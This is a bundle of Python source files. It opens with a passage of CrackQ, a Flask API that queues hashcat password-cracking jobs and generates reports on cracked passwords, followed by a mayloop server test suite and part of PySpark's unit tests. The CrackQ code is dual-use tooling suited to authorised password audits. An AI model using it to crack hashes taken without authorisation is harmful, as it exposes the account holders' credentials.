name = None timeout = 1814400 if 'jobtimeout' in CRACK_CONF: if not CRACK_CONF['jobtimeout']['Modify']: logger.debug('Timeout modification not permitted') timeout = CRACK_CONF['jobtimeout']['Value'] else: if 'timeout' in args: timeout = args['timeout'] hc_args = { 'hash_file': hash_file, 'session': job_id, 'wordlist': wordlist if attack_mode != 3 else None, 'wordlist2': wordlist2 if attack_mode == 1 else None, 'mask': mask if attack_mode > 2 else None, 'mask_file': True if mask_file else False, 'attack_mode': attack_mode, 'hash_mode': mode, 'outfile': outfile, 'rules': rules, 'username': username, 'increment': increment, 'increment_min': increment_min, 'increment_max': increment_max, 'brain': brain, 'name': name, 'pot_path': pot_path, 'restore': 0, } q_args = { 'job_id': job_id, 'kwargs': hc_args, } try: q = self.crack_q.q_connect() try: if hc_args['restore'] > 0: job = self.q.fetch_job(job_id) if job.meta['brain_check']: logger.debug('Brain check previously complete') elif job.meta['brain_check'] is None: self.speed_check(q_args=q_args) time.sleep(3) else: logger.debug('Restored job, disabling speed check') else: logger.debug('Job not a restore, queuing speed_check') self.speed_check(q_args=q_args) time.sleep(3) ###***remove below now? 
except KeyError as err: logger.debug('Job not a restore, queuing speed_check') self.speed_check(q_args=q_args) time.sleep(3) self.crack_q.q_add(q, q_args, timeout=timeout) logger.debug('API Job {} added to queue'.format(job_id)) logger.debug('Job Details: {}'.format(q_args)) job = self.q.fetch_job(job_id) job.meta['email_count'] = 0 if 'notify' in args: job.meta['notify'] = args['notify'] else: job.meta['notify'] = False if current_user.email: if email_check(current_user.email): job.meta['email'] = str(current_user.email) job.meta['last_seen'] = str(current_user.last_seen) elif email_check(current_user.username): job.meta['email'] = current_user.username job.meta['last_seen'] = str(current_user.last_seen) job.meta['CrackQ State'] = 'Run/Restored' job.meta['Speed Array'] = [] job.save_meta() return job_id, 202 except KeyError as err: logger.warning('Key missing from meta data:\n{}'.format(err)) return job_id, 202 except TypeError as err: logger.warning('Type error in job meta data:\n{}'.format(err)) return job_id, 202 def reporter(cracked_path, report_path): """ Simple method to call pypal and save report (html & json) """ nltk.download('wordnet') report = pypal.Report(cracked_path=cracked_path, lang='EN', lists='/opt/crackq/build/pypal/src/lists/') report_json = report.report_gen() with open(report_path, 'w') as fh_report: fh_report.write(json.dumps(report_json)) return True class Reports(MethodView): """ Class for creating and serving HTML password analysis reports Calls pypal with the location of the specified crackq output file for a given job_id, provided auth is accepted """ def __init__(self): self.crack_q = crackqueue.Queuer() self.q = self.crack_q.q_connect() self.report_q = self.crack_q.q_connect(queue='reports') rconf = CRACK_CONF['redis'] self.redis_con = Redis(rconf['host'], rconf['port']) self.report_dir = CRACK_CONF['reports']['dir'] self.log_dir = CRACK_CONF['files']['log_dir'] self.adder = Adder() @login_required def get(self, job_id=None): """ 
Method to get report file Returns ------ report: file HTML report file generated by Pypal """ try: marsh_schema = parse_json_schema().load(request.args) args = marsh_schema except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 if 'job_id' not in args: logger.debug('Reports queue requested') failed = rq.registry.FailedJobRegistry(queue=self.report_q) comp = rq.registry.FinishedJobRegistry(queue=self.report_q) started = rq.registry.StartedJobRegistry(queue=self.report_q) reports_dict = {} reports_dict.update({j: 'Generated' for j in comp.get_job_ids()}) reports_dict.update({j: 'Failed' for j in failed.get_job_ids()}) reports_dict.update({j: 'Running' for j in started.get_job_ids()}) return reports_dict, 200 else: job_id = str(args['job_id'].hex) # Check for existing session info logger.debug('User requesting report') if job_id: if job_id.isalnum(): check_job = check_jobid(job_id) if not check_job: return abort(401) if self.adder.session_check(self.log_dir, job_id): logger.debug('Valid session found') report_path = valid.val_filepath(path_string=self.report_dir, file_string='{}.json'.format(job_id)) try: with report_path.open('r') as rep: return json.loads(rep.read()), 200 except IOError as err: logger.debug('Error reading report: {}'.format(err)) return {'msg': 'No report generated for' ' this job'}, 500 else: return jsonify(ERR_INVAL_JID), 404 @login_required def post(self): """ Method to trigger report generation """ logger.debug('User requesting report') try: marsh_schema = parse_json_schema().load(request.json) args = marsh_schema except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 try: job_id = args['job_id'].hex except KeyError as err: logger.debug('No job ID provided') job_id = None except AttributeError as err: logger.debug('No job ID provided') job_id = None except TypeError as err: logger.debug('No job ID provided') job_id = None # Check 
for existing session info if job_id: self.adder = Adder() if job_id.isalnum(): check_job = check_jobid(job_id) if not check_job: return {'msg': 'Not Authorized'}, 401 if self.adder.session_check(self.log_dir, job_id): logger.debug('Valid session found') cracked_path = str(valid.val_filepath(path_string=self.log_dir, file_string='{}.cracked'.format(job_id))) report_path = str(valid.val_filepath(path_string=self.report_dir, file_string='{}.json'.format(job_id))) job = self.q.fetch_job(job_id) min_report = CRACK_CONF['misc']['min_report'] if job.meta['HC State']['Cracked Hashes'] < int(min_report): return {'msg': 'Cracked password list too ' 'small for meaningful ' 'analysis'}, 500 try: logger.debug('Generating report: {}' .format(cracked_path)) rep = self.report_q.enqueue(reporter, cracked_path, report_path, job_timeout=10080, result_ttl=604800, job_id='{}_report'.format(job_id)) if rep: return {'msg': 'Successfully queued ' 'report generation'}, 202 else: return {'msg': 'Error no report data ' 'returned'}, 500 except IOError: logger.debug('No cracked passwords found for this job') return {'msg': 'No report available for Job ID'}, 404 else: return jsonify(ERR_INVAL_JID), 404 class Profile(MethodView): """Flask User/profile management""" @login_required def get(self): """ View user profile """ result = {} try: result['user'] = current_user.username result['admin'] = current_user.is_admin result['email'] = current_user.email except AttributeError: abort(404) return jsonify(result), 200 @login_required def post(self): """ Update current user profile Arguments --------- password: string Current Password new_password: string New Password confirm_password: string New Password email: string Email address Returns ------- result: JSON message, HTTP code """ try: marsh_schema = parse_json_schema().load(request.json) args = marsh_schema except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 logger.debug('Updating user 
details') user = User.query.filter_by(id=current_user.id).first() ret = [] if isinstance(user, User) and 'password' in args: if args['password']: if 'new_password' in args and 'confirm_password' in args: if args['confirm_password'] and args['new_password']: if args['new_password'] != args['confirm_password']: return {'msg': 'Passwords do not match'}, 400 if bcrypt.check_password_hash(user.password, args['password']): pass_hash = bcrypt.generate_password_hash(args['new_password']) user.password = pass_hash.decode('utf-8') logger.debug('Updating password') ret.append({'msg': 'Password updated'}) crackq.app.session_interface.regenerate(session) else: return {'msg': 'Invalid Password'}, 401 if 'email' in args: if args['email'] and email_check(args['email']): if bcrypt.check_password_hash(user.password, args['password']): user.email = args['email'] logger.debug('Updating email') ret.append({'msg': 'Email updated'}) else: return {'msg': 'Invalid Password'}, 401 #else: # return {'msg': 'Invalid Email'}, 500 if ret: db.session.commit() return jsonify(ret), 200 return {'msg': 'Invalid Request'}, 500 class Admin(MethodView): """Flask Admin and user management""" @admin_required @login_required def get(self, user_id): """ View list of users or details of a single user Arguments --------- user_id: uuid/None User's ID to view details (if None show all) """ if user_id: result = {} try: user = User.query.filter_by(id=user_id).first() result['user_id'] = str(user.id) result['user'] = user.username result['admin'] = user.is_admin result['email'] = user.email except AttributeError: abort(404) else: result = [] users = User.query.all() for user in users: entry = {} entry['user_id'] = str(user.id) entry['user'] = user.username entry['admin'] = user.is_admin entry['email'] = user.email result.append(entry) return jsonify(result), 200 @admin_required @login_required def post(self): """ Creates a new user Arguments --------- user: string Username to create password: string Password 
email: string Email address Returns ------- result: tuple message, HTTP code """ try: marsh_schema = parse_json_schema().load(request.json) args = marsh_schema except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 args_needed = ['password', 'confirm_password', 'user'] if all(arg in args for arg in args_needed): if args['password'] != args['confirm_password']: return {'msg': 'Passwords do not match'}, 400 logger.debug('Creating User: {}'.format(args['user'])) pass_hash = bcrypt.generate_password_hash(args['password']).decode('utf-8') email = args['email'] if args['email'] else None create_user(username=args['user'], password=pass_hash, email=email) return {'msg': 'User created'}, 200 return {'msg': 'Error'}, 500 @admin_required @login_required def delete(self, user_id): """ Deletes a user account Arguments --------- user: string Username to make admin Returns ------- result: boolean Function success or failure """ if del_user(user_id): return {'msg': 'User deleted'}, 200 abort(404) @admin_required @login_required def put(self, user_id): """ Toggle admin privs for selected user Arguments --------- user_id: 1 User ID to make admin Returns ------- result: boolean Function success or failure """ user = User.query.filter_by(id=user_id).first() if isinstance(user, User): user.is_admin = not user.is_admin db.session.commit() return 'OK', 200 return 404 @admin_required @login_required def patch(self, user_id): """ Update selected user profile Arguments --------- new_password: string New Password confirm_password: string New Password email: string Email address Returns ------- result: JSON message, HTTP code """ try: marsh_schema = parse_json_schema().load(request.json) args = marsh_schema except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 logger.debug('Updating user details') user = User.query.filter_by(id=user_id).first() if isinstance(user, User): ret 
= [] if 'email' in args: if email_check(args['email']): logger.debug('Adding email address: {}'.format(args['email'])) user.email = args['email'] ret.append({'msg': 'Email updated'}) if 'new_password' in args and 'confirm_password' in args: if args['confirm_password'] and args['new_password']: if args['new_password'] != args['confirm_password']: return {'msg': 'Passwords do not match'}, 400 pass_hash = bcrypt.generate_password_hash(args['new_password']).decode('utf-8') user.password = pass_hash ret.append({'msg': 'Password updated'}) if ret: db.session.commit() ###***logout any sessions belonging user here return jsonify(ret), 200 return {'msg': 'Nothing to update'}, 200 return {'msg': 'Error'}, 500 class Benchmark(MethodView): """Run and display Hashcat Benchmarks""" def __init__(self): self.log_dir = CRACK_CONF['files']['log_dir'] self.bench_file = valid.val_filepath(path_string=self.log_dir, file_string='sys_benchmark.json') self.crack_q = crackqueue.Queuer() self.q = self.crack_q.q_connect() @login_required def get(self): """ View benchmark data """ result = {} try: with open(self.bench_file, 'rb') as bench_fh: result = json.loads(bench_fh.read()) except IOError as err: logger.error('Unable to open benchmark file: {}'.format(err)) abort(404) except Exception as err: logger.error('Benchmark read erorr: {}'.format(err)) return jsonify(result), 200 @login_required def post(self, benchmark_all=False): """ Run benchmark Arguments --------- benchmark_all: boolean Run full benchmark (--benchmark-all) Returns ------- result: JSON Message, HTTP code """ try: marsh_schema = parse_json_schema().load(request.json) args = marsh_schema except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 logger.debug('Queuing benchmark job') job_id = uuid.uuid4().hex add_jobid(job_id) q = self.crack_q.q_connect() hc_args = {} if 'benchmark_all' in args: hc_args['benchmark_all'] = args['benchmark_all'] hc_args['benchmark'] = True 
hc_args['name'] = 'Benchmark' hc_args['session'] = job_id try: q_args = { 'job_id': job_id, 'kwargs': hc_args, } self.crack_q.q_add(q, q_args) logger.debug('API Job {} added to queue'.format(job_id)) logger.debug('Job Details: {}'.format(q_args)) job = self.q.fetch_job(job_id) job.meta['email_count'] = 0 job.meta['notify'] = True if current_user.email: if email_check(current_user.email): job.meta['email'] = str(current_user.email) job.meta['last_seen'] = str(current_user.last_seen) elif email_check(current_user.username): job.meta['email'] = current_user.username job.meta['last_seen'] = str(current_user.last_seen) job.meta['CrackQ State'] = 'Run/Restored' job.meta['Speed Array'] = [] job.save_meta() return job_id, 202 except Exception as err: logger.error('Error running benchmark: {}'.format(err)) return {'msg': 'Invalid Request'}, 500
# ---- file boundary: test_mainloop.py ----
from unittest import TestCase, main as ut_main, skip
import logging
from threading import Thread
from multiprocessing import Process
from time import sleep

from mutils.system import is_py3

from mayloop.mainloop import MainLoop
from mayloop.config import Config
from mayloop.imported.twisted.internet_protocol import Factory
from .mock_protocols import ReturnFixedMessage
from .mock_client import Client

# The Queue class moved to the 'queue' module in Python 3.
if is_py3():
    from queue import Queue
else:
    from Queue import Queue


class TestMainLoop(TestCase):
    """Integration tests for MainLoop.

    A single server process is started lazily by the @start_server
    decorator on the first decorated test and reused for the whole run;
    it always answers with ``exp_response`` (via ReturnFixedMessage).
    tearDownClass terminates the process.
    """

    server_process = None                # shared server Process, started on first test
    port = 40002                         # TCP port the test server listens on
    multiple_client_counts = [10, 100]   # batch sizes for the multi-client tests
    exp_response = 'test response'       # fixed payload the mock protocol returns
    server_logfile = 'server.log'

    @classmethod
    def setUpClass(cls):
        # Configure the mock protocol's canned reply before the server starts.
        ReturnFixedMessage.message = cls.exp_response

    @classmethod
    def tearDownClass(cls):
        if cls.server_process is not None:
            print('stopping server..')
            cls.server_process.terminate()

    @classmethod
    def start_server_loop(cls, port):
        """Run a MainLoop server; target of the server subprocess."""
        config = Config()
        config.add_service('', port, Factory.forProtocol(ReturnFixedMessage))
        config.start_logger(target=cls.server_logfile, level=logging.DEBUG)
        server = MainLoop(config)
        server.start()

    # NOTE: this is a decorator consumed at class-definition time, so it is
    # deliberately a plain function (no self/cls, no @staticmethod);
    # test_func is the test method being wrapped.
    def start_server(test_func):
        def new_func(self):
            if self.server_process is None:
                print('starting server..')
                TestMainLoop.server_process = Process(target=TestMainLoop.start_server_loop, args=(self.port,))
                TestMainLoop.server_process.start()
                sleep(1)  # give the server a moment to start listening
            test_func(self)
        return new_func

    @start_server
    def test_single_client(self):
        client = Client('', self.port)
        client.connect()
        client.close()
        # Fix: assertEquals is a deprecated alias, removed in Python 3.12.
        self.assertEqual(client.response, self.exp_response)

    @start_server
    def test_multiple_clients_serial(self):
        for i in self.multiple_client_counts:
            for j in range(i):
                client = Client('', self.port)
                client.connect()
                client.close()
                self.assertEqual(client.response, self.exp_response)

    @start_server
    def test_multiple_clients_parallel(self):
        def client_thread(port, client_id, results):
            client = Client('', port)
            client.connect()
            client.close()
            results.put((client_id, client.response))

        for i in self.multiple_client_counts:
            threads = []
            results = Queue()

            for j in range(i):
                t = Thread(target=client_thread, args=(self.port, j, results))
                t.start()
                threads.append(t)
                if (j+1)%10 == 0:
                    sleep(0.01)  # stagger connection bursts

            for j in range(i):
                threads[j].join()
                # Results arrive in completion order, not thread order; the
                # queued client_id is reported in the failure message.
                client_id, response = results.get()
                self.assertEqual(response, self.exp_response, msg='client %d failed'%client_id)


if __name__ == '__main__':
    ut_main()
# ---- file boundary: tests.py (PySpark unit tests) ----
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """ Unit tests for PySpark; additional tests are implemented as doctests in individual modules. """ from array import array from glob import glob import os import re import shutil import subprocess import sys import tempfile import time import zipfile import random import threading import hashlib from py4j.protocol import Py4JJavaError if sys.version_info[:2] <= (2, 6): try: import unittest2 as unittest except ImportError: sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier') sys.exit(1) else: import unittest if sys.version_info[0] >= 3: xrange = range basestring = str if sys.version >= "3": from io import StringIO else: from StringIO import StringIO from pyspark.conf import SparkConf from pyspark.context import SparkContext from pyspark.rdd import RDD from pyspark.files import SparkFiles from pyspark.serializers import read_int, BatchedSerializer, MarshalSerializer, PickleSerializer, \ CloudPickleSerializer, CompressedSerializer, UTF8Deserializer, NoOpSerializer, \ PairDeserializer, CartesianDeserializer, AutoBatchedSerializer, AutoSerializer, \ FlattenedValuesSerializer from pyspark.shuffle import Aggregator, InMemoryMerger, ExternalMerger, ExternalSorter from pyspark 
import shuffle from pyspark.profiler import BasicProfiler _have_scipy = False _have_numpy = False try: import scipy.sparse _have_scipy = True except: # No SciPy, but that's okay, we'll skip those tests pass try: import numpy as np _have_numpy = True except: # No NumPy, but that's okay, we'll skip those tests pass SPARK_HOME = os.environ["SPARK_HOME"] class MergerTests(unittest.TestCase): def setUp(self): self.N = 1 << 12 self.l = [i for i in xrange(self.N)] self.data = list(zip(self.l, self.l)) self.agg = Aggregator(lambda x: [x], lambda x, y: x.append(y) or x, lambda x, y: x.extend(y) or x) def test_in_memory(self): m = InMemoryMerger(self.agg) m.mergeValues(self.data) self.assertEqual(sum(sum(v) for k, v in m.items()), sum(xrange(self.N))) m = InMemoryMerger(self.agg) m.mergeCombiners(map(lambda x_y: (x_y[0], [x_y[1]]), self.data)) self.assertEqual(sum(sum(v) for k, v in m.items()), sum(xrange(self.N))) def test_small_dataset(self): m = ExternalMerger(self.agg, 1000) m.mergeValues(self.data) self.assertEqual(m.spills, 0) self.assertEqual(sum(sum(v) for k, v in m.items()), sum(xrange(self.N))) m = ExternalMerger(self.agg, 1000) m.mergeCombiners(map(lambda x_y1: (x_y1[0], [x_y1[1]]), self.data)) self.assertEqual(m.spills, 0) self.assertEqual(sum(sum(v) for k, v in m.items()), sum(xrange(self.N))) def test_medium_dataset(self): m = ExternalMerger(self.agg, 20) m.mergeValues(self.data) self.assertTrue(m.spills >= 1) self.assertEqual(sum(sum(v) for k, v in m.items()), sum(xrange(self.N))) m = ExternalMerger(self.agg, 10) m.mergeCombiners(map(lambda x_y2: (x_y2[0], [x_y2[1]]), self.data * 3)) self.assertTrue(m.spills >= 1) self.assertEqual(sum(sum(v) for k, v in m.items()), sum(xrange(self.N)) * 3) def test_huge_dataset(self): m = ExternalMerger(self.agg, 5, partitions=3) m.mergeCombiners(map(lambda k_v: (k_v[0], [str(k_v[1])]), self.data * 10)) self.assertTrue(m.spills >= 1) self.assertEqual(sum(len(v) for k, v in m.items()), self.N * 10) m._cleanup() def 
test_group_by_key(self): def gen_data(N, step): for i in range(1, N + 1, step): for j in range(i): yield (i, [j]) def gen_gs(N, step=1): return shuffle.GroupByKey(gen_data(N, step)) self.assertEqual(1, len(list(gen_gs(1)))) self.assertEqual(2, len(list(gen_gs(2)))) self.assertEqual(100, len(list(gen_gs(100)))) self.assertEqual(list(range(1, 101)), [k for k, _ in gen_gs(100)]) self.assertTrue(all(list(range(k)) == list(vs) for k, vs in gen_gs(100))) for k, vs in gen_gs(50002, 10000): self.assertEqual(k, len(vs)) self.assertEqual(list(range(k)), list(vs)) ser = PickleSerializer() l = ser.loads(ser.dumps(list(gen_gs(50002, 30000)))) for k, vs in l: self.assertEqual(k, len(vs)) self.assertEqual(list(range(k)), list(vs)) class SorterTests(unittest.TestCase): def test_in_memory_sort(self): l = list(range(1024)) random.shuffle(l) sorter = ExternalSorter(1024) self.assertEqual(sorted(l), list(sorter.sorted(l))) self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True))) self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x))) self.assertEqual(sorted(l, key=lambda x: -x, reverse=True), list(sorter.sorted(l, key=lambda x: -x, reverse=True))) def test_external_sort(self): l = list(range(1024)) random.shuffle(l) sorter = ExternalSorter(1) self.assertEqual(sorted(l), list(sorter.sorted(l))) self.assertGreater(shuffle.DiskBytesSpilled, 0) last = shuffle.DiskBytesSpilled self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True))) self.assertGreater(shuffle.DiskBytesSpilled, last) last = shuffle.DiskBytesSpilled self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x))) self.assertGreater(shuffle.DiskBytesSpilled, last) last = shuffle.DiskBytesSpilled self.assertEqual(sorted(l, key=lambda x: -x, reverse=True), list(sorter.sorted(l, key=lambda x: -x, reverse=True))) self.assertGreater(shuffle.DiskBytesSpilled, last) def test_external_sort_in_rdd(self): conf = 
SparkConf().set("spark.python.worker.memory", "1m") sc = SparkContext(conf=conf) l = list(range(10240)) random.shuffle(l) rdd = sc.parallelize(l, 4) self.assertEqual(sorted(l), rdd.sortBy(lambda x: x).collect()) sc.stop() class SerializationTestCase(unittest.TestCase): def test_namedtuple(self): from collections import namedtuple from pickle import dumps, loads P = namedtuple("P", "x y") p1 = P(1, 3) p2 = loads(dumps(p1, 2)) self.assertEqual(p1, p2) def test_itemgetter(self): from operator import itemgetter ser = CloudPickleSerializer() d = range(10) getter = itemgetter(1) getter2 = ser.loads(ser.dumps(getter)) self.assertEqual(getter(d), getter2(d)) getter = itemgetter(0, 3) getter2 = ser.loads(ser.dumps(getter)) self.assertEqual(getter(d), getter2(d)) def test_attrgetter(self): from operator import attrgetter ser = CloudPickleSerializer() class C(object): def __getattr__(self, item): return item d = C() getter = attrgetter("a") getter2 = ser.loads(ser.dumps(getter)) self.assertEqual(getter(d), getter2(d)) getter = attrgetter("a", "b") getter2 = ser.loads(ser.dumps(getter)) self.assertEqual(getter(d), getter2(d)) d.e = C() getter = attrgetter("e.a") getter2 = ser.loads(ser.dumps(getter)) self.assertEqual(getter(d), getter2(d)) getter = attrgetter("e.a", "e.b") getter2 = ser.loads(ser.dumps(getter)) self.assertEqual(getter(d), getter2(d)) # Regression test for SPARK-3415 def test_pickling_file_handles(self): ser = CloudPickleSerializer() out1 = sys.stderr out2 = ser.loads(ser.dumps(out1)) self.assertEqual(out1, out2) def test_func_globals(self): class Unpicklable(object): def __reduce__(self): raise Exception("not picklable") global exit exit = Unpicklable() ser = CloudPickleSerializer() self.assertRaises(Exception, lambda: ser.dumps(exit)) def foo(): sys.exit(0) self.assertTrue("exit" in foo.__code__.co_names) ser.dumps(foo) def test_compressed_serializer(self): ser = CompressedSerializer(PickleSerializer()) try: from StringIO import StringIO except ImportError: 
from io import BytesIO as StringIO  # Python 3: the stream carries bytes
        io = StringIO()
        ser.dump_stream(["abc", u"123", range(5)], io)
        io.seek(0)
        self.assertEqual(["abc", u"123", range(5)], list(ser.load_stream(io)))
        # Appending a second stream to the same buffer must also round-trip.
        ser.dump_stream(range(1000), io)
        io.seek(0)
        self.assertEqual(["abc", u"123", range(5)] + list(range(1000)),
                         list(ser.load_stream(io)))
        io.close()

    def test_hash_serializer(self):
        """Every serializer must be hashable (hash() must not raise)."""
        hash(NoOpSerializer())
        hash(UTF8Deserializer())
        hash(PickleSerializer())
        hash(MarshalSerializer())
        hash(AutoSerializer())
        hash(BatchedSerializer(PickleSerializer()))
        hash(AutoBatchedSerializer(MarshalSerializer()))
        hash(PairDeserializer(NoOpSerializer(), UTF8Deserializer()))
        hash(CartesianDeserializer(NoOpSerializer(), UTF8Deserializer()))
        hash(CompressedSerializer(PickleSerializer()))
        hash(FlattenedValuesSerializer(PickleSerializer()))


class QuietTest(object):
    """Context manager that raises log4j's root level to FATAL for its duration."""

    def __init__(self, sc):
        self.log4j = sc._jvm.org.apache.log4j

    def __enter__(self):
        self.old_level = self.log4j.LogManager.getRootLogger().getLevel()
        self.log4j.LogManager.getRootLogger().setLevel(self.log4j.Level.FATAL)

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Always restore the previous level, even if the body raised.
        self.log4j.LogManager.getRootLogger().setLevel(self.old_level)


class PySparkTestCase(unittest.TestCase):
    """Base case giving each test its own SparkContext and a sys.path snapshot."""

    def setUp(self):
        self._old_sys_path = list(sys.path)  # addPyFile mutates sys.path; restore later
        class_name = self.__class__.__name__
        self.sc = SparkContext('local[4]', class_name)

    def tearDown(self):
        self.sc.stop()
        sys.path = self._old_sys_path


class ReusedPySparkTestCase(unittest.TestCase):
    """Base case sharing a single SparkContext across the whole test class."""

    @classmethod
    def setUpClass(cls):
        cls.sc = SparkContext('local[4]', cls.__name__)

    @classmethod
    def tearDownClass(cls):
        cls.sc.stop()


class CheckpointTests(ReusedPySparkTestCase):
    """RDD checkpointing behaviour against a throwaway checkpoint directory."""

    def setUp(self):
        # NamedTemporaryFile only reserves a unique path; the file itself is
        # removed so Spark can create a directory at that path.
        self.checkpointDir = tempfile.NamedTemporaryFile(delete=False)
        os.unlink(self.checkpointDir.name)
        self.sc.setCheckpointDir(self.checkpointDir.name)

    def tearDown(self):
        shutil.rmtree(self.checkpointDir.name)

    def test_basic_checkpointing(self):
        """checkpoint() must materialize the RDD under the configured directory."""
        parCollection = self.sc.parallelize([1, 2, 3, 4])
        flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
        self.assertTrue(flatMappedRDD.getCheckpointFile() is None)

        flatMappedRDD.checkpoint()
        result = flatMappedRDD.collect()
        time.sleep(1)  # 1 second — give the checkpoint time to be written
        self.assertTrue(flatMappedRDD.isCheckpointed())
        self.assertEqual(flatMappedRDD.collect(), result)
        # The checkpoint file must live under the configured checkpoint dir.
        self.assertEqual("file:" + self.checkpointDir.name,
                         os.path.dirname(os.path.dirname(flatMappedRDD.getCheckpointFile())))

    def test_checkpoint_and_restore(self):
        """A checkpointed RDD must be readable back via _checkpointFile."""
        parCollection = self.sc.parallelize([1, 2, 3, 4])
        flatMappedRDD = parCollection.flatMap(lambda x: [x])

        self.assertFalse(flatMappedRDD.isCheckpointed())
        self.assertTrue(flatMappedRDD.getCheckpointFile() is None)

        flatMappedRDD.checkpoint()
        flatMappedRDD.count()  # forces a checkpoint to be computed
        time.sleep(1)  # 1 second

        self.assertTrue(flatMappedRDD.getCheckpointFile() is not None)
        recovered = self.sc._checkpointFile(flatMappedRDD.getCheckpointFile(),
                                            flatMappedRDD._jrdd_deserializer)
        self.assertEqual([1, 2, 3, 4], recovered.collect())


class AddFileTests(PySparkTestCase):
    """Behaviour of SparkContext.addFile / addPyFile on the driver and executors."""

    def test_add_py_file(self):
        """addPyFile must make a module importable inside executor tasks."""
        # To ensure that we're actually testing addPyFile's effects, check that
        # this job fails due to `userlibrary` not being on the Python path:
        # disable logging in log4j temporarily
        def func(x):
            from userlibrary import UserClass
            return UserClass().hello()
        with QuietTest(self.sc):
            self.assertRaises(Exception,
                              self.sc.parallelize(range(2)).map(func).first)

        # Add the file, so the job should now succeed:
        path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
        self.sc.addPyFile(path)
        res = self.sc.parallelize(range(2)).map(func).first()
        self.assertEqual("Hello World!", res)

    def test_add_file_locally(self):
        """addFile must download the file to a distinct driver-local path."""
        path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
        self.sc.addFile(path)
        download_path = SparkFiles.get("hello.txt")
        self.assertNotEqual(path, download_path)
        with open(download_path) as test_file:
            self.assertEqual("Hello World!\n", test_file.readline())

    def test_add_py_file_locally(self):
        # To ensure that
we're actually testing addPyFile's effects, check that
        # this fails due to `userlibrary` not being on the Python path:
        def func():
            from userlibrary import UserClass
        self.assertRaises(ImportError, func)
        path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
        self.sc.addPyFile(path)
        # After addPyFile the module must import on the driver as well.
        from userlibrary import UserClass
        self.assertEqual("Hello World!", UserClass().hello())

    def test_add_egg_file_locally(self):
        """addPyFile with a zip archive must make its packages importable."""
        # To ensure that we're actually testing addPyFile's effects, check that
        # this fails due to `userlibrary` not being on the Python path:
        def func():
            from userlib import UserClass
        self.assertRaises(ImportError, func)
        path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1.zip")
        self.sc.addPyFile(path)
        from userlib import UserClass
        self.assertEqual("Hello World from inside a package!", UserClass().hello())

    def test_overwrite_system_module(self):
        """A user-supplied module must shadow the stdlib module of the same name."""
        self.sc.addPyFile(os.path.join(SPARK_HOME,
                                       "python/test_support/SimpleHTTPServer.py"))

        import SimpleHTTPServer
        self.assertEqual("My Server", SimpleHTTPServer.__name__)

        def func(x):
            import SimpleHTTPServer
            return SimpleHTTPServer.__name__

        # The override must be visible inside executor tasks as well.
        self.assertEqual(["My Server"],
                         self.sc.parallelize(range(1)).map(func).collect())


class RDDTests(ReusedPySparkTestCase):
    """Assorted RDD API tests sharing a single SparkContext."""

    def test_range(self):
        """sc.range must honour start/stop/step like built-in range."""
        self.assertEqual(self.sc.range(1, 1).count(), 0)
        self.assertEqual(self.sc.range(1, 0, -1).count(), 1)
        self.assertEqual(self.sc.range(0, 1 << 40, 1 << 39).count(), 2)

    def test_id(self):
        """id() is stable per RDD and increments for derived RDDs."""
        rdd = self.sc.parallelize(range(10))
        id = rdd.id()
        self.assertEqual(id, rdd.id())
        rdd2 = rdd.map(str).filter(bool)
        id2 = rdd2.id()
        self.assertEqual(id + 1, id2)
        self.assertEqual(id2, rdd2.id())

    def test_save_as_textfile_with_unicode(self):
        # Regression test for SPARK-970
        x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x])
        tempFile = tempfile.NamedTemporaryFile(delete=True)
        tempFile.close()  # only the unique name is needed; Spark creates the dir
        data.saveAsTextFile(tempFile.name)
        raw_contents = b''.join(open(p, 'rb').read()
                                for p in glob(tempFile.name + "/part-0000*"))
        self.assertEqual(x, raw_contents.strip().decode("utf-8"))

    def test_save_as_textfile_with_utf8(self):
        """saveAsTextFile must write pre-encoded UTF-8 bytes through unchanged."""
        x = u"\u00A1Hola, mundo!"
        data = self.sc.parallelize([x.encode("utf-8")])
        tempFile = tempfile.NamedTemporaryFile(delete=True)
        tempFile.close()
        data.saveAsTextFile(tempFile.name)
        raw_contents = b''.join(open(p, 'rb').read()
                                for p in glob(tempFile.name + "/part-0000*"))
        self.assertEqual(x, raw_contents.strip().decode('utf8'))

    def test_transforming_cartesian_result(self):
        # Regression test for SPARK-1034
        rdd1 = self.sc.parallelize([1, 2])
        rdd2 = self.sc.parallelize([3, 4])
        cart = rdd1.cartesian(rdd2)
        # Only checks that mapping over a cartesian result completes.
        result = cart.map(lambda x_y3: x_y3[0] + x_y3[1]).collect()

    def test_transforming_pickle_file(self):
        # Regression test for SPARK-2601
        data = self.sc.parallelize([u"Hello", u"World!"])
        tempFile = tempfile.NamedTemporaryFile(delete=True)
        tempFile.close()
        data.saveAsPickleFile(tempFile.name)
        pickled_file = self.sc.pickleFile(tempFile.name)
        pickled_file.map(lambda x: x).collect()

    def test_cartesian_on_textfile(self):
        # Regression test for
        path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
        a = self.sc.textFile(path)
